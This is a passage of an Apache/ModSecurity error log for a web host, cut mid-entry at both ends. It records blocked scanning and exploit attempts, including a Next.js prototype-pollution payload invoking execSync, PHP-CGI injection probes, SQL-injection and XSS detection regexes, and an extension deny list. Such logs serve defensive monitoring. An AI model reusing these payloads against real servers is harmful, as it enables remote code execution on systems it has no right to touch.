"WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aT_F5ULDcg6uwZPGGSPCiQAAANU"] [Mon Dec 15 10:25:14.889530 2025] [:error] [pid 14112:tid 14129] [client 74.7.227.33:35008] [client 74.7.227.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aT_F6sCVC_ji-tlSelfDWQAAAQg"] [Mon Dec 15 10:25:15.929822 2025] [:error] [pid 14112:tid 14135] [client 74.7.227.33:35008] [client 74.7.227.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aT_F68CVC_ji-tlSelfDZAAAAQ4"] [Mon Dec 15 10:25:17.788030 2025] [:error] [pid 8330:tid 8333] [client 74.7.227.33:35012] [client 74.7.227.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aT_F7ULDcg6uwZPGGSPClwAAAMA"] [Mon Dec 15 10:25:17.966644 2025] [core:error] [pid 8330:tid 8356] [client 74.7.227.33:35012] AH10244: invalid URI path (/dev-style/js/%url%) [Fri Dec 19 01:02:32.459339 2025] [:error] [pid 2259:tid 2304] [client 3.110.45.17:36406] [client 3.110.45.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aUSICHnQBpdkP6-EvaW5VAAAABc"] [Mon Jan 19 19:52:27.198739 2026] [:error] [pid 10506:tid 10515] [client 3.135.209.63:57486] [client 3.135.209.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aW5vW2V_0hYdLF3nIer9ewAAAcY"] [Tue Jan 20 03:24:04.557737 2026] [:error] [pid 10259:tid 10358] [client 85.11.167.4:40484] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768872272_1711',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768872272_171..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aW7ZNB7Hwf8ORR2qjNjlUgAAA0s"], referer: https://web.dev-unit.com [Tue Jan 20 03:24:04.632165 2026] [:error] [pid 10259:tid 10367] [client 85.11.167.4:40496] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768872272',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768872272',{'timeo..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aW7ZNB7Hwf8ORR2qjNjlUwAAA1Q"], referer: https://web.dev-unit.com [Tue Jan 20 15:19:44.544498 2026] [:error] [pid 8144:tid 8206] [client 74.7.227.181:41548] [client 74.7.227.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aW-A8OUdhuyGYjCDKOPq7gAAAQw"], referer: https://web.dev-unit.com/en/solutions/dev-unit.com/ [Tue Jan 20 15:19:46.870712 2026] [:error] [pid 8144:tid 8224] [client 74.7.227.181:56044] [client 74.7.227.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aW-A8uUdhuyGYjCDKOPq8gAAARU"], referer: https://web.dev-unit.com/en/services/dev-unit.com/ [Wed Jan 21 12:31:45.989918 2026] [:error] [pid 15387:tid 15396] [client 206.81.24.74:59116] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aXCrEW6_A_AdD8wUl33B3wAAAEc"] [Wed Jan 21 12:31:46.036356 2026] [:error] [pid 15286:tid 15307] [client 167.99.210.137:32990] [client 167.99.210.137] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aXCrEh5lgSKJ3_oZIGAvJQAAABE"] [Wed Jan 21 12:31:54.062566 2026] [authz_core:error] [pid 15387:tid 15406] [client 206.81.24.74:60606] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Wed Jan 21 12:31:54.115683 2026] [authz_core:error] [pid 15387:tid 15407] [client 167.99.210.137:47064] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Wed Jan 21 12:32:01.493066 2026] [:error] [pid 15286:tid 15305] [client 139.59.136.184:52902] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aXCrIR5lgSKJ3_oZIGAvZgAAAA8"] [Wed Jan 21 12:32:03.667228 2026] [:error] [pid 15387:tid 15408] [client 206.189.95.232:58986] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aXCrI26_A_AdD8wUl33CHAAAAFM"] [Wed Jan 21 12:32:09.509915 2026] [authz_core:error] [pid 15288:tid 15369] [client 139.59.136.184:44460] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Wed Jan 21 12:32:11.729944 2026] [authz_core:error] [pid 15387:tid 15390] [client 206.189.95.232:59062] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Wed Jan 21 13:37:30.807550 2026] [autoindex:error] [pid 15287:tid 15324] [client 74.7.242.8:37420] AH01276: Cannot serve directory /home/id/dev-unit.com/devweb-lastV/public/storage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.web.dev-unit.com/en/services/web-hosting [Wed Jan 21 13:37:44.651700 2026] [:error] [pid 25014:tid 25075] [client 74.7.242.8:55490] [client 74.7.242.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aXC6iHLIO_PWqexXeXqZZQAAAU4"], referer: https://www.web.dev-unit.com/dev-unit.com/ [Wed Jan 21 13:37:49.893435 2026] [:error] [pid 25014:tid 25079] [client 74.7.242.8:55490] [client 74.7.242.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aXC6jXLIO_PWqexXeXqZgAAAAVI"], referer: https://www.web.dev-unit.com/en/services/dev-unit.com/ [Wed Jan 21 13:37:50.958006 2026] [:error] [pid 25014:tid 25075] [client 74.7.242.8:55490] [client 74.7.242.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aXC6jnLIO_PWqexXeXqZiQAAAU4"], referer: https://www.web.dev-unit.com/en/solutions/dev-unit.com/ [Wed Jan 21 13:37:52.821467 2026] [:error] [pid 15288:tid 15351] [client 74.7.242.8:40988] [client 74.7.242.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aXC6kGEzb_Shfsx6R9ysewAAAQs"], referer: https://www.web.dev-unit.com/en/dev-unit.com/ [Wed Jan 21 13:37:54.871737 2026] [core:error] [pid 15288:tid 15369] [client 74.7.242.8:40988] AH10244: invalid URI path (/dev-style/js/%url%), referer: https://www.web.dev-unit.com/dev-style/js/jquery.magnific-popup.min.js [Wed Jan 21 15:19:20.897199 2026] [:error] [pid 9034:tid 9069] [client 216.73.216.25:22757] [client 216.73.216.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aXDSWFPeY05vrzGQ7fhszAAAAdM"] [Wed Jan 21 16:35:14.895097 2026] [:error] [pid 15287:tid 15318] [client 216.73.216.25:33543] [client 216.73.216.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aXDkIgz6CiQTL-6LgpqyQAAAAMA"] [Wed Jan 21 16:35:15.395661 2026] [:error] [pid 15287:tid 15325] [client 216.73.216.25:33543] [client 216.73.216.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aXDkIwz6CiQTL-6LgpqyQgAAAMc"] [Wed Jan 21 16:35:15.897035 2026] [:error] [pid 15287:tid 15352] [client 216.73.216.25:33543] [client 216.73.216.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aXDkIwz6CiQTL-6LgpqyQwAAANU"] [Thu Jan 22 08:09:57.238648 2026] [:error] [pid 15779:tid 15857] [client 18.188.174.228:39272] [client 18.188.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match 